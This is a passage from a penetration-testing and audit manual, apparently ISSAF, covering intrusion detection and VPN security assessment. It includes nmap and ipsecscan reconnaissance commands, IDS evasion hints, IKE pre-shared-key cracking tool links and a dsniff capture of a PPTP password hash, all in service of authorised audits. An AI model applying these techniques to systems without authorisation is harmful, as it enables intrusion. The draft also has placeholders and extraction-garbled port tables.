Bind to local host
L.19 FURTHER READING[S]
Page 665 of 1123
M INTRUSION DETECTION SYSTEM SECURITY
ASSESSMENT
M.1 DESCRIPTION
Networks are vulnerable to attacks against which a firewall alone may not be enough. An
Intrusion Detection System (IDS) provides an additional layer of protection to a firewall.
IDS monitors the network’s local host devices and network traffic for signs of attempted
attacks and network security breaches. They can be deployed on an individual host or
on a part of the network. Their primary purpose is to examine the local or network trafic
for intrusions and report these intrusions to the security administrator. Firewall and IDS
systems provide a good layer of protection against an intruder.
M.1.1 What is an IDS?
An IDS or Intrusion Detection System collects information from a variety of system and
network sources, and analyzes the information for signs of intrusion (attacks coming
from outside the local network) and misuse (attacks originating inside the network.)
M.1.2 Benefits of an IDS
Intrusion Detection Systems can perform a variety of functions like:
•
Monitoring and analysis of user and system activity
•
Auditing of system configurations and vulnerabilities
•
Assessing the integrity of critical system and data files
•
Recognition of activity patterns reflecting known attacks
•
Statistical analysis for abnormal activity patterns
•
Operating system audit trail management, with recognition of user activity
reflecting policy violations
•
The combination of these features allows system or network administrators to
more easily handle the monitoring, audit, and assessment of their systems and
networks to fiind signs of outside intrusions or local misuse of computer systems.
Page 666 of 1123
M.1.3 Types of IDS
M.1.3.1 HOST-BASED – INTRUSION DETECTION SYSTEMS (HIDS)
Host intrusion detection systems are intrusion detection systems that are installed locally
on host machines. HIDS can be installed on many different types (roles) of machines
namely servers, workstations and notebook computers. Traffic transmitted to the host is
analyzed for potentially malicious packets within the data transmission. HIDS are more
focused on the changes on the local machine changing aspect compared to the networkbased focus of a Network-based Intrusion Detection System (NIDS). HIDS are also more
platforms specific and several HIDS are available for Microsoft Windows. A few HIDS
also function in the UNIX and other OS topology environments. GFILanguard is one of
nice product.
M.1.3.2 NETWORK-BASED – INTRUSION DETECTION SYSTEMS (NIDS)
A NIDS analyzes all packets at a network level to determine the occurrence of an
intrusion. A NIDS agent places the network interface card into “promiscuous” mode and
audits all traffic crossing the interface. As a general rule, it should be able to analyze all
traffic within a specific network segment. Therefore, with switched networks, a NIDS
agent should be connected to the monitoring port of the hub. A NIDS agent functions as
an appropriate software module that resides on one of servers within a LAN segment.
However, the volume of packets sent over contemporary LANs is enormous. If the NIDS
agent has inadequate capacity to handle extreme loads, it can miss packets due to
congestion on the network link that it is monitoring it and fail to collect the next packets
that are received. Therefore, a NIDS must function close to real-time. On the other hand,
a NIDS agent itself may overload the system it resides in and “incapacitate” the system
to perform other tasks. This weakness spurs NIDS manufacturers to develop data
collecting agents as a dedicated system to be installed on a separate robust PC (for
instance, NFR NID-100 is offered as a CD-ROM to boot the system). Another option is a
complete system encompassing both hardware and software (for example, Cisco
NetRanger
is
Cisco
software
running
on
Solaris
operating
system).
Page 667 of 1123
NIDS are installed to remediate problems having characteristic attacks (for example ping
of death or IIS .ida). They can also be used to deal with lesser events that are
preparative
steps
for
an
attack
(for
example,
port
scan).
For detecting aberrant traffic, NIDS use some other techniques as presented below.
M.1.3.3 STATISTICAL ANOMALY
Increasingly, HIDS are using technologies which allow them to detect alterations to
important system files and assets. As a rule, the files to check are periodically checksummed and compared against a checksum database. If a checksum does not match
the current result stored in a checksum database, this means that the file integrity is
suspect. Obviously, this rule can be used to monitor only critical non-alterable system
files.
Certain HIDS are able to verify features of certain assets. It is well known, for example,
that system log files are incremental files. Therefore, the system should be configured so
that an alarm is triggered as soon as the system detects any abnormal logs.
A number of products that deal with monitoring of files and assets are available on the
market. They are denoted with a FIA (File Integrity Assessment) abbreviation. The first
program likely to employ file integrity assessment by checksum verification was Tripwire.
When deploying HIDS software, attention must be paid to provide security for the
databases used by the system (event detection rule files, checksum files). Imagine if
your operating system is under attack and the attacker knows that your OS uses HIDS
coverage. By making changes to the system, the attacker may also modify the database
containing signatures of changed files. Therefore, it is a good idea to store signatures
and other databases, as well as configuration files and HIDS binaries using a nonerasable method – for example, a write-protected diskette or a CD-ROM.
M.1.3.4 PATTERN MATCHING
Page 668 of 1123
NIDS have used pattern-matching since their origins. Each packet on the network is
received by the listening system. The NIDS then filters and compares network packets
on a byte-code matching basis, against a database of known attack signatures (or
patterns). The attack signature is a known technique used by anti-virus programs. CA
eTrust uses the same engine – InoculateIT – as the anti-virus software of the same
manufacturer. This method is easy to deploy, but requires a powerful system to reside
on. In addition, there is an exponential relation between the amount of processed data or
detected attacks (signatures) and the demand for computational power.
M.2 PURPOSE
The purpose of this document is to offer a full overview on Intrusion Detection Systems
and the assessment of this kind of systems, from a auditor/pen-tester point of view. This
document can be used as a reference for any system audit.
M.3 REQUIREMENT
[Text]
M.3.1 Understand Organization’s environment
•
Determine the size and complicity of organization
•
Determine Organization’s dependence on Information system
•
Understand organization’s mission
•
Understand organizational structure and roles and responsibilities of key IT
personnel involved and also the IT staff managing the Intrusion Detection System
•
How information systems are used to support organization to achieve it’s mission
•
Understand the threat objects and associated risks to organization
M.3.2 Technical Requirements
M.4 TERMINOLOGY
[Text]
Page 669 of 1123
M.5 HISTORY
Several methods to counter the emergence of worms have been investigated. Prominent
among these are network-based Intrusion Detection System, which monitor the network
for any suspicious activity. When such an activity is seen, it is immediately reported via a
pre-determined notification method.
The notion of a DIDS has been around since the late 1980s. However, it wasn’t until the
global connectivity of the Internet that the importance of correlated data from various
agents became important to understand major occurrences of intrusions. For this
reason, large scale DIDS came into effect in the late 1990s. Robbins [46] outlines the
primary motivations for moving from individual IDS to a DIDS. DIDS have also proven to
be effective in the rapid assessment of virus activity across the Internet. A good example
of this was the detection of the 2001 Lion worm at the Internet Storm Center at SANS
(SysAdmin, Audit, Network, Security Institute [4]). Distributed Intrusion Detection
Systems are now widely accepted as standards for detecting intrusions on a worldwide
scale. They receive data from various sources such as personal firewall logs, enterprise
IDS logs and educational institutes. An analysis is carried out on the data and the
required authorities are contacted via e-mail. This helps many ISPs and domain owners
to find computers running malicious software on their networks.
M.6 OBJECTIVE
The objective of an IDS audit is to find if the IDS functions upto standards agreed upon
in the security check-list. The audit should help determine if the IDS meets base-line
requirements.
M.6.1 Perspective One
e.g. Security Assessor/Penetration Tester
M.6.2 Perspective Two
e.g. System Administrator
M.7 EXPECTED RESULT
[Text]
Page 670 of 1123
M.8 METHODOLOGY / PROCESS
Information Gathering
Information gathering is the first step of an audit. The auditor/pen-tester must obtain as
much information possible about the company/organization he is auditing. Information
can be obtained using passive methods (Passive Information Gathering) and active
methods (Active Information Gathering).
•
Passive Information Gathering
Passive information gathering is a method of obtaining information about the specific
company/organization through non-active methods including social engineering. The
needed information can be obtained by using regular public sources of information, like
search engines, whois queries, USENET posts, mailing lists and other sources.
Any method of indirect communication with the audited company/organization using
virtual or real channels to obtain the needed information can be considered passive
information gathering. The chief point of this method is to not raise any suspicions on the
client end.
•
Active Information Gathering
Active information gathering is a method of obtaining information about the specific
company/organization by using active tools. Information can be obtained by scanning
the company’s networks for systems, open ports, vulnerabilities, to make an overview of
the level of security that the specific company/organization has.
Also social engineering can be used to obtain information about the company audited.
Any method of direct communication with the audited company/organisation using virtual
or real channels to obtain specific information about its systems and can be considered
active information gathering.
Identify Intrusion Detection Systems
Vendor
IDS
TCP/IP
Protocol[s]
Protocol[s]
Port / Options
Snort
Page 671 of 1123
Dragon
Cisco Secure IDS
Network Flight Recorder(NFR)
•
Identify Sensor
o
Attack on target and if sensor is configured in push data mode. It will reveal
the identity.
•
Identify Management Station and Centralize Logging System
Scan for Default Ports
Perform Service Scan
Perform Banner Grabbing
If one has access to a hub, and network transmissions on the internal network of an
organization watch for huge data transfers typically during off-office hours (between
10pm and 7am) The data transfers will indicate where the data is being stored, aka the
back-up machines. Back-up machines are also not generally production machines and
security priority may be a bit low. Replay attacks on backup servers can give one the
IDS data that the IDS engine is working on. Configuring a IDS can give the attacker
knowledge about the IDS rules and hence knowledge to circumvent the IDS rules.
Refer section -- --
Identify Product specific vulnerabilities
Perform Exploit Research and Proof of Concept
Network Mapping
Refer ISSAF Methodology Section
Vulnerability Identification
Refer ISSAF Methodology Section
Penetration
Refer ISSAF Methodology Section
Gaining Access and Privileges Escalation
Page 672 of 1123
Refer ISSAF Methodology Section
Enumerate Further
Refer ISSAF Methodology Section
Maintaining Access
Refer ISSAF Methodology Section
Covering the Tracks
Refer ISSAF Methodology Section
Audit
Refer ISSAF Methodology Section
Reporting
Refer ISSAF Methodology Section
M.8.1 Clean-up and Destroy Artifacts
Refer ISSAF Methodology Section
M.9 AUDIT INTRUSION DETECTION SYSTEM
M.10 PROCESS ISSUES
M.10.1
Is there any process to minimize false positives?
M.10.2
Is there any process to minimize false negatives?
M.10.3
Is there any process to analyze the IDS Logs Regular
basis?
Typically IDS logs should be analyzed by humans to verify any machine error that may
be occurring. Visual determination of IDS logs is very important to the development of
Page 673 of 1123
accurate IDS rules. There is quite a cognitive gap between determination of a problem
by a system and a human being.
M.10.4
Is there any process to tune Firewall/Router rule-base
based on IDS alerts?
The dynamic configuration of firewall/router rule-based logs is generally achieved by
Intrusion Prevention Systems. However, one must carefully analyze the logs before
allowing such permissions. It is critical that the crossover error rate, CER (the acceptable
value where the false positive and false negative rates cross each other on a graph) be
set according to the acceptable risks to the system being secured. This is generally done
during a training period for the IDS where manual intervention is needed to identify the
acceptable value of CER.
M.10.5
Is there any incident response process based on IDS
alerts?
M.10.6
Is there any action taken based on intrusions identified in
past?
M.10.7
Is there any process to address any performance issue
raised by IDS?
As one can see, an IDS evaluates network flow to determine an attack. The IDS
therefore forms a performance bottleneck. Sufficient resources should be provided to the
IDS so that the performance of the IDS is more or less that acceptable by the system.
The performance of the network and the end systems that are protected by the IDS are
important considerations for this. If we have an extremely fast network and systems
being protected by an IDS, the IDS becomes a bottleneck. On the other hand, if a slow
system and network are protected by a rapid IDS, resources devoted to the IDS are
wasted because faster processing by the IDS does not result in any performance gain
on the network of system.
One way of increasing IDS performance is by placing a rule-based firewall in front of the
IDS. The firewall will drop insignificant or known bad packets such as certain ICMP
packets. Thus IDS performance can be increased by reducing the packets it receives.
Page 674 of 1123
M.10.8
Is there any process for manageability of data?
Since IDS works on log data, the data size on the IDS system increases exponentially
with the distance it is placed at from the end systems. It should be noted that IDS is not
typically suited for boundary detection. In practice, a log rotation policy is implemented to
reduce the storage on the IDS. This can be achieved via cron scripts and a network
storage appliance such and a SAN/NAS.
M.10.9
Is
the
IDS
Management
Team
knows
Operating
Mechanism of It?
Typically the management team has at least one person devoted to writing new IDS
rules or examining IDS alerts. However, during setup and configuration larger personnel
support may be devoted to setting up the baseline for an IDS.
M.10.10
Number of People having access to IDS is small and in
control
M.11 IS THERE ANY PROCESS FOR TRAINING IDS MANAGEMENT TEAM?
M.12 FEATURES
•
Is it providing any feature for Remote Management of Sensor, Centralize Log
Server and other Devices?
•
Is there any module for reporting?
•
Is it having features for reactive response to firewall/router and block certain
traffic accordingly?
•
Is the system scalable (e.g. many sensors can be monitor/managed)?
•
Is it having capability to analyze all kind of high level applications with sufficient
details?
•
Are the IDS reporting tools efficient for followings?
o
Provides list of events
o
Provides nice GUIs with icons representing events
M.13 PLACEMENT OF IDS COMPONENTS
Explain it as per our network diagram. I will make it till 16th August….
Page 675 of 1123
•
Identify placement of critical assets in the enterprise network.
•
Identify threats to critical systems
•
Identify critical assets (server / applications / services)
•
Is the device placed for appropriate intrusion detection? (e.g. placement of
sensor on the external interface of router.)
•
Make sure traffic is not creating any network latency problem.
•
Is multiple sensors are implemented?
M.14 SENSOR
M.14.1
•
Detection of sensor (Stealth)
Which methods of data transfer it supports (Push Data or Pull Data)?
o
Is the system configured to push data to analysis engine?
ƒ
Advantage – Reports attacks as they occur.
ƒ
Disadvantage – Sensor sends packet responses and which can
reveal identification of sensor.
ƒ
Countermeasure – Configure the sensor to send data periodically
even if an attack has not occurred.
o
Is the analysis engine configured to pull data (pull data mode) from
sensor?
M.14.2
ƒ
Advantage – Sends alerts
ƒ
Disadvantage – Doesn’t give detail.
ƒ
Remarks - To get detail queries needs to be made.
Is the Sensor plugged in Into Network?
This check seems very funny but many times it’s been seen that IDS is deployed in
enterprise but sensor is not even plugged in.
M.14.3
Is the Sensor Having Low Effect on Network/Host
Performance?
M.14.4
Speed of packet capture
Page 676 of 1123
M.14.5
Is the Communication between SENSORS and Centralize
Los Server Robust?
M.14.6
Type of deployment (SPAN / Standalone)
M.14.7
Security on sensor
•
Security on device
•
Security during data transit (SSL)
M.14.8
OS and dependencies
M.15 DETECTION ENGINE
M.15.1
Is it analyzing all Network Protocols?
M.15.2
Is the latest Signatures Updated?
M.15.3
Is the Signatures are downloaded via a secure method?
M.15.4
Is it detecting for Simple Attacks?
Perform an attack using any assessment/hacking tool (e.g. nessus, nikto etc…) on target
and see if IDS is detecting it or not.
M.15.5
Is it Differentiating between Normal and Abnormal traffic?
•
Example One: Spoofing attack
•
Example Two:
•
Example Three:
M.15.6
Is there are any Parameters crashes the system?
M.15.7
Alerts
•
Is it having alert mechanism by e-mail, alert, pager, sms?
Page 677 of 1123
•
Is it alerting for suspicious modification into files and databases?
•
Is it alerting for adding any binary?
•
Is it alerting for suspicious modification into log files, system files and user
accounts?
•
Is the method for alerting relevant staff robust and smooth?
Page 678 of 1123
M.15.8
Packet ripping techniques used
M.15.9
Level of packet ripping and inspection
M.15.10
Inspection techniques used
M.15.11
Fragment reassembly
M.15.12
Reassembly buffer size (Buffer overflows check)
M.15.13
Detection of DOS, DDOS Attacks
M.15.14
Detection of standard and nonstandard port-scan / host-
scan
M.15.15
Central processor load
M.15.16
Load bearing capacity (No of Sensors)
M.15.17
Security during transit (SSL)
M.15.18
Is it detecting Attacks generated internally by Authorized
personnel over a long period of Time?
M.15.19
Is it taking advantage of log produced by other systems?
M.15.20
IDS Evading
M.15.21
Security on system
M.15.22
OS and Dependencies
Page 679 of 1123
M.16 RULE CONFIGURATION AND MANAGEMENT INTERFACE
M.16.1
Rule update procedure (Encrypted and Digitally signed…)
M.16.2
Rule loading system (dynamic loading /static loading)
M.16.3
Ease of rule configuration (Addition / Modification)
M.16.4
Depth of rules (Layer 2 to Layer 7)
M.16.5
Storage / Version Control and Security of Rule
M.16.6
Ease of use on Management Interface
M.16.7
Configurable systems (Control over rule manager / sensor
/ logging engine)
M.16.8
Use of database for operations
M.16.9
Database security
M.16.10
Is the filters implemented to Minimize False Positives?
Page 680 of 1123
M.17 LOGGING SYSTEMS
M.17.1
Reliability of Alarm Logging
In the case where a high volume of log is generated, is the system having capability to
log all of them.
M.17.2
Type of logging supported
M.17.3
Topologies supported
M.17.4
Levels / depth of logging
M.17.5
Security during transit
M.17.6
High availability configurations
M.17.7
Backend database and security
M.17.8
OS/dependencies
M.18 LIST OF COMMON IDS/IPS PRODUCTS
This is a list with regular IDS used on Internet and any other networks around these
days. It includes tool name, link to find it and a brief description.
1. Anzen Flight Jacket (http://www.anzen.com/afj/)
This is a user-programmable, real-time network monitoring system for intrusion detection
and traffic analysis. Anzen Flight Jacket (AFJ) passively examines network traffic,
identifying attacks, probes, and other anomalous events in real-time. AFJ's distributed
architecture allows for centralized management of remote sensors deployed throughout
an enterprise network.
2. Authd (ftp://ftp.cerias.purdue.edu/pub/tools/)
Page 681 of 1123
Free authentication server daemon software. Makes it easier to trace attackers, a simple
tool for IDS uses
3. BlackICE Defender http://www.networkice.com/Products/BlackICE/default.htm
This is a regular firewall, but has some simple IDS rules. A medium tool, especially for
home-use and for regular users
4. Centrax http://www.cybersafe.com/solutions/centrax.html
Here is a complete intrusion detection suite that integrates network and host-based
intrusion detection, vulnerability assessment, and audit policy management into a single,
easy-to-use package. Centrax provides the most effective balance between network and
host technologies, providing maximum protection against all threats to an enterprise. The
system also includes vulnerability analysis and policy management to complete its
comprehensive detection and response capability. One of the best IDSs around
5. Cisco Secure IDS
http://www.cisco.com/warp/public/cc/cisco/mkt/security/nranger/index.shtml
An enterprise-scale, real-time, intrusion detection system designed to detect, report, and
terminate unauthorized activity throughout a network. The industry's first intrusion
detection system, The Cisco Secure Intrusion Detection System is the dynamic security
component of Cisco's end-to-end security product line, best all-rounder.
6. Clog (ftp://ftp.cerias.purdue.edu/pub/tools/)
Other IDS from CERIAS, This one, like Authd it’s all free.
7. VIRENT (http://www.afirm.org/virent.html/)
A "Honey pot"-like IDS. Can emulate any existing network. Has active discovery
capabilities. Has rapid response capabilities. Provides a platform for network security
simulations. Provided as a turnkey solution. Including all hardware, software and
training. SANE™ certified for the support of AFIRM (IPSEC, ANSA and OPSEC support
spec'd).
8. Vanguard Enforcer (http://viplink.com/products/enforcer.cfm)
"Monitors the security systems and facilities that protect critical data and other resources
on your mainframe 24 hours a day seven days a week. Enforcer makes certain that the
Page 682 of 1123
standards, policies, rules and settings defined by your security experts are in force and
stay in force. With Vanguard Enforcer, you will never have to wonder whether the
security implementation on your mainframe is protecting your critical resources
effectively. This technology ensures that security on your mainframe systems
continuously adheres to "best practices" standards and your own security policies."
9. TTY-Watcher (ftp://ftp.cerias.purdue.edu/pub/tools/)
Another free tool from CERIAS, a user monitoring tool
10. Tivoli Cross Site for Security
(http://www-4.ibm.com/software/security/firstsecure/cross-site.html)
A network-based intrusion detection product that detects, logs and responds to intrusion
attempts in realtime. The Tivoli Cross-Site for Security product can protect against the
latest varieties of hacker attempts, such as denial of service, port scanning and attacks
specific to application services, including telnet, FTP and DNS. Made by IBM Corp.
11. Tcp_wrappers (ftp://ftp.cerias.purdue.edu/pub/tools/)
With this package you can monitor and filter incoming requests for the SYSTAT,
FINGER, FTP, TELNET, RLOGIN, RSH, EXEC, TFTP, TALK, and other network
services. Works fine with TCPdump, also from CERIAS.
12. Tcpdump (ftp://ftp.cerias.purdue.edu/pub/tools/)
We know this one. Still one of the best IDSs used today.
13. Snort (http://www.snort.org/)
Freeware network intrusion detection system, capable of performing real-time traffic
analysis and packet logging on IP networks. Widely used by sys-admin all over the
world, it’s the best free IDS around.
14. SilentRunner (http://www.silentrunner.com/)
Network security solution specifically designed to address the insider threat. A passive
network discovery LAN engine, consisting of ten major modules, permits the user to view
in real-time network topology and activity levels, display individual terminal activity,
create and execute Boolean logic alerts and sort and process network data for further
detailed visualization and analysis.
Page 683 of 1123
15. Security Manager (http://www.netiq.com/products/sm/default.asp)
NetIQ's Security Manager provides an advanced, central security console for real-time
security event monitoring and automated response, host-based intrusion detection,
event log consolidation, and security configuration management.
16. Patriot IDS (http://www.patriot-tech.com/ids.htm)
A real-time network attack recognition and response system. Designed for maximum
intrusion detection performance, superior security, and turnkey operations, Patriot’s IDS
provides the ultimate intrusion detection appliance. Powered by the "best of breed" Intel
components and Internet Security Systems’ RealSecure software, Patriot’s IDS offers
the highest level of protection for your network. The Patriot IDS consists of two
components: the Network IDS Console, and the Network IDS Engines.
17. eTrust Internet Defense (http://www3.ca.com/Solutions/Solution.asp?ID=271)
Delivers state-of-the-art network protection including protection against the deployment
and execution of Distributed Denial of Service attacks - an essential capability at a time
when networks are susceptible to an increasingly sophisticated array of attacks. A truly
comprehensive solution, eTrust Intrusion Detection includes an integrated anti-virus
engine with automatic signature updates. It’s an all-in-one option and can be used
successfully in any network environment, fast deployment time also.
18. Intruder Alert (http://www.axent.com/)
This tool monitors systems and networks in real-time to detect security breaches and
suspicious activities and will respond automatically according to your established
security policy. It works across your entire enterprise including LANs, WANs, intranets
and the Internet. It’s best for wide deployment on your entire network infrastructure.
M.19 DEFAULT PORTS – IDS/IPS
8.1.1.1 ISS PROVENTIA G200 REV A /REALSECURE SENSORS
Service
Port Service Identified
Available To
Comments
Page 684 of 1123
Listening
TCP 22
SSH
TCP 901
Sensor Appliance
TCP 2998
Sensor controller
TCP 12
JDBC
TCP 2998
Sensor Controller
TCP 3996-3999
Application server
TCP 90x (x=1,2,3…)
Sensors
Realsecure IDS
collectors
Open ports on
Sensors
Management server
&
event
Console
Only one of these
communication
ports open
Communication
X varies as number of
between sensors &
management server
sensors or event
collector increases
8.1.1.2 NAI MCAFEE ENTERCEPT 4.1
Service
Port
Listening
Service Identified
TCP/5005
Management server
TCP 443
HTTPS
Available To
Comments
IPS agent uses this
port
Web console for
mgmt
8.1.1.3 NAI MCAFEE INTRUSHIELD 4000
Service
Listening
Port
Service Identified
TCP 22
SSH
UDP 169
SNMP
Available To
Comments
Sensor
Page 685 of 1123
TCP 80
HTTP
TCP 443
HTTPS
MANAGEMENT
TCP 8555
Console
SERVER
UDP 8500
Proprietary
Sensor to
TCP 8501-8504
Proprietary
management server
CONSOLE TO
8.1.1.4 NETSCREEN-IDP 500
Service
Listening
Port
Service Identified
UDP 7201-7202
Proprietary
UDP 7101-7102
Proprietary
TCP 7203
Proprietary
Available To
Comments
Sensor
to
Mgmt
server
Mgmt
server
sensor
GUI Mgmt Console
Page 686 of 1123
to
8.1.1.5 TIPPING POINT UNITYONE 1200
Service
Listening
Port
Service Identified
TCP 22
SSH
TCP 443
HTTPS
UDP 161
SNMP
TCP 23
Telnet
TCP 80
HTTP
ICMP
Ping
TCP 22
SSH
TCP 443
HTTPS
TCP 10042
SSL Java Client
UDP 8162-8163
SNMP
UDP 500
ISAKMP
TCP 23
Telnet
TCP 80
HTTP
ICMP
Ping
TCP 943
GUI Console
Available To
Comments
Sensors
Open for Sensors
Optional, Disabled by
default for sensors
Default Ports open on
management server
Optional, Disabled by
default for sensors
Page 687 of 1123
8.1.1.6 NFR NID 320
Service
Port
Listening
Service Identified
TCP 1968
Sensor
UDP 123
Optional
TCP 1968
Available To
Comments
Requires
for
time
synchronization
Management server
TCP 2010
8.1.1.7 SYMANTEC MANHUNT
Service
Listening
QSP protocol
Port
Service Identified
Proprietary
Available To
Used
for
Comments
communication
between
administrative console and Manhunt Nodes
Page 688 of 1123
8.1.1.8 CISCO IDS
Service
Listening
TCP 22
Port
Service Identified
Available To
Comments
SSH
Sensor
Open on sensor
TCP 443
TCP 52514
TCP 9652
Cisco Common
Service Port
Management server
Open on
management station
TCP 1272
TCP 10033
TCP 1741-1742
Web Console
For Administration
Page 689 of 1123
N VPN SECURITY ASSESSMENT
N.1 INTRODUCTION
A Virtual Private Network (VPN) connects the components and resources of one network
over another network. VPNs accomplish this by allowing the user to tunnel through the
Internet or another public network in a manner that lets the tunnel participants enjoy the
same security and features formerly available only in private networks (see Figure 1).
N.2 VIRTUAL PRIVATE NETWORK
VPNs allow telecommuters, remote employees like salespeople, or even branch offices
to connect in a secure fashion to a corporate server located at the edge of the corporate
Local Area Network (LAN) using the routing infrastructure provided by a public
internetwork (such as the Internet). From the user's perspective, the VPN is a point-topoint connection between the user's computer and a corporate server. The nature of the
intermediate internetwork is irrelevant to the user because it appears as if the data is
being sent over a dedicated private link.
N.2.1 Common Uses of VPNs
The next few subsections describe in more detail common VPN situations.
Page 690 of 1123
N.2.1.1 REMOTE USER ACCESS OVER THE INTERNET
VPNs provide remote access to corporate resources over the public Internet, while
maintaining privacy of information. Figure 2 shows a VPN used to connect a remote user
to a corporate intranet.
Figure 2. Using a VPN to connect a remote client to a private LAN
Rather than making a leased line, long distance (or 1-800) call to a corporate or
outsourced Network Access Server (NAS), the user first calls a local ISP NAS phone
number. Using the local connection to the ISP, the VPN software creates a virtual private
network between the dial-up user and the corporate VPN server across the Internet.
N.2.1.2 CONNECTING NETWORKS OVER THE INTERNET
There are two methods for using VPNs to connect local area networks at remote sites:
•
Using dedicated lines to connect a branch office to a corporate LAN.
•
Using a dial-up line to connect a branch office to a corporate LAN.
Figure 3. Using a VPN to connect two remote sites
Page 691 of 1123
N.2.1.3 CONNECTING COMPUTERS OVER AN INTRANET
In some corporate internetworks, the departmental data is so sensitive that the
department's LAN is physically disconnected from the rest of the corporate internetwork.
While this protects the department's confidential information, it creates information
accessibility problems for those users not physically connected to the separate LAN.
N.2.1.4 FIGURE 4. USING A VPN TO CONNECT TO TWO COMPUTERS ON THE SAME LAN
VPNs allow the department's LAN to be physically connected to the corporate
internetwork but separated by a VPN server. Note that the VPN server is NOT acting as
a router between the corporate internetwork and the department LAN. A router would
interconnect the two networks, allowing everyone access to the sensitive LAN. By using
a VPN, the network administrator can ensure that only those users on the corporate
internetwork who have appropriate credentials (based on a need-to-know policy within
the company) can establish a VPN with the VPN server and gain access to the protected
resources of the department. Additionally, all communication across the VPN can be
encrypted for data confidentiality. Those users who do not have the proper credentials
cannot view the department LAN.
N.3 BASIC VPN REQUIREMENTS
Therefore, at a minimum, a VPN solution should provide all of the following:
•
User Authentication
•
Address Management
•
Data Encryption
•
Key Management
•
Multi-protocol Support
Page 692 of 1123
N.4 TUNNELING TECHNOLOGIES
Tunneling technologies have been in existence for some time. Some examples of
mature technologies include:
•
SNA tunneling over IP internetworks
•
IPX tunneling for Novell NetWare over IP internetworks
•
New Tunneling technologies:
o
Point-to-Point Tunneling Protocol (PPTP).
o
Layer 2 Tunneling Protocol (L2TP).
o
IP Security (IPSec) Tunnel Mode.
N.5 PURPOSE
N.6 REQUIREMENT
N.7
BJECTIVE
[Text]
N.8 EXPECTED RESULT
[Text]
N.9 METHODOLOGY / PROCESS
[Text]
Brief Intro and Table of Contents
N.10 VPN DISCOVERY
N.10.1
Concepts and Ports used
Virtual Private Networks (VPN) has become very popular these days. The benefits
asociated with their implementation are reduction of the comunication costs, and “easy”
Page 693 of 1123
and “secure” way to interconnect devices or networks using the big public network
Internet.
VPNs can be implemented to acomplish two diferent escenarios:
•
Remote acccess clients or roaming clients
o
The VPN server is configured to accept connections from anywhere.
The security is related to the authenticacion
and authorization
mechanism put in place.
•
Interconnect remote networks
o
The VPN server only accept VPN Connections attempts from certains
Ips.
Both of these scenarios rely their security on the encryption protocols used.
The protocols used are:
•
IPSec
•
PPTP
•
L2TP
A VPN server could be discovered based on the ports that are open on the target, so
using a standard port scan could help.
Also a scanning of IP options for finding Responses to GRE / ESP / etc ..
According to the different responses there associated protocol / scenarios
VPN Protocol
TCP/IP Protocol
Port / Option
PPTP
IP
47 (GRE)
PPTP
TCP
1723
IPSEC
UDP
500 (IKE)
IPSEC
IP
50 (ESP)
IPSEC
IP
51 (AH)
L2TP
UDP
1701
L2F
UDP
1701
Examples:
Finding a ISAKMP service (IPSec VPN Server) looking for port 500 UDP
Page 694 of 1123
owner:~# nmap -P0 -sU -p 500 192.168.0.1
Starting nmap 3.55 ( http://www.insecure.org/nmap/ ) at 2004-08-14 09:51 ART
Interesting ports on target.com (192.168.0.1):
PORT
STATE SERVICE
500/udp open isakmp
Nmap run completed -- 1 IP address (1 host up) scanned in 12.671 seconds
Finding a PPTP VPN Server looking for port 1723 TCP
owner:~# nmap -P0 -sT -p 1723 192.168.0.1
Starting nmap 3.55 ( http://www.insecure.org/nmap/ ) at 2004-08-14 09:55 ART
Interesting ports on target.com (192.168.0.1):
PORT
STATE SERVICE
1723/tcp open pptp
Nmap run completed -- 1 IP address (1 host up) scanned in 0.962 seconds
N.10.2
IPSec Discovery
IPSecScan is a tool that can scan either a single IP address or a range of IP addresses
looking for systems that are IPSec enabled.
[Download http://ntsecurity.nu/toolbox/ipsecscan/]
Example:
C:\VPN Security\tools>ipsecscan.exe 192.168.0.1 192.168.0.2
IPSecScan 1.1 - (c) 2001, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
- http://ntsecurity.nu/toolbox/ipsecscan/
Page 695 of 1123
192.168.0.1 IPSec status: Enabled
192.168.0.2 IPSec status: Indeterminable
N.11 VPN FINGERPRINTING
One of the techniques used for fingerprinting a VPN Server is analyze the first packets
exchanged on a IKE scenario. Because the RFC does not specify the times and strategy
used for retransmission of UDP paquets. All vendors implement the retransmission
differently and sometimes also on different firmware for the same product.
This technique is valid only for IKE based VPN Server.
The technique is described on http://www.nta-monitor.com/ike-scan/whitepaper.pdf
The tool that implements that technique is ike-scan, and is available for the Linux /
Microsoft Platforms.
http://www.nta-monitor.com/ike-scan/download.htm
N.12 IKE AGGRESSIVE MODE HACK
The purpose of this section is to find if the target VPN Server is configured to accept IKE
Aggressive Mode.
Most of the VPN Servers, accept or switch automatically if the client request to
Aggressive Mode and start using a PreShared Key (PSK).
The Problem is that this PreShared Key is not sent encrypted because the tunnel is not
established yet.
An attack client can use this to discover the PreShared Key and hack the VPN Server.
There
is
a
tool
available
for
finding
this
vulnerability
http://www.ernw.de/download/ikeprobe.zip
Also this tools are available
http://ikecrack.sourceforge.net
http://www.oxid.it/cain.html
N.13 PPTP/SECURITY FLAW
Many vulnerability have been discovered on the implementation of the PPTP and its
related protocols (MPPE, MSCHAP, MSCHAPv2). Those vulnerabilities are explained on
the paper http://www.schneier.com/pptp.html
Page 696 of 1123
We could split the subject in two parts:
•
PPTP Protocol Vulnerabilities: The protocol itself has been proved to be
vulnerable to some atacks mentioned on the Scheier paper. Microsoft has
patched those vulnerabilities, but it’s still not recommended for high security
environments.
•
PPTP Authentication mechanism: As PPTP is like a Remote Access
Conection to the VPN Server on Microsoft Enviroments, several protocols
could be used for the client authentication. Those are CHAP, MSCHAP,
MSCHAP V2, EAP. MSCHAP, MSCHAPv2 are vulnerable if a third party can
sniff the wire and the crack the hashes. For example the password sniffing
tool “dsniff” is capable to understand the authentication protocols of a PPTP
VPN session establishment.
Example:
Using sniff to catch a PPTP conection
owner:~# dsniff
dsniff: listening on eth0
08/15/04 03:05:13 gre 192.168.0.1 -> vpnserver.com (pptp)
DOMAIN\Username:0:9B310870A8D1CXEC:0000000000000000000000000
00000000000000000000000:6AF13DCD112407WDCSS04E398851DD4F40
BEDECCCF3D6FE13D
N.14 SPLIT TUNNELING HACK
This is applicable to remote end users that connect to a central location.
"Split tunneling" is the term used to describe a multiple-branch networking path. This
depends on the VPN Client Software, and the policy that are implemented, but some
VPN Client software when connects to a remote location, only adds a route for the
remote network class, so only the traffic for the remote location is routed using the VPN
connection and all other traffic goes directly using the end user Internet Connection.
This allows a remote attacker to access a corporate network using a VPN Client
Computer compromised.
It is recommend disabling “split tunneling” and routing all traffic using the VPN
Connection.
Page 697 of 1123
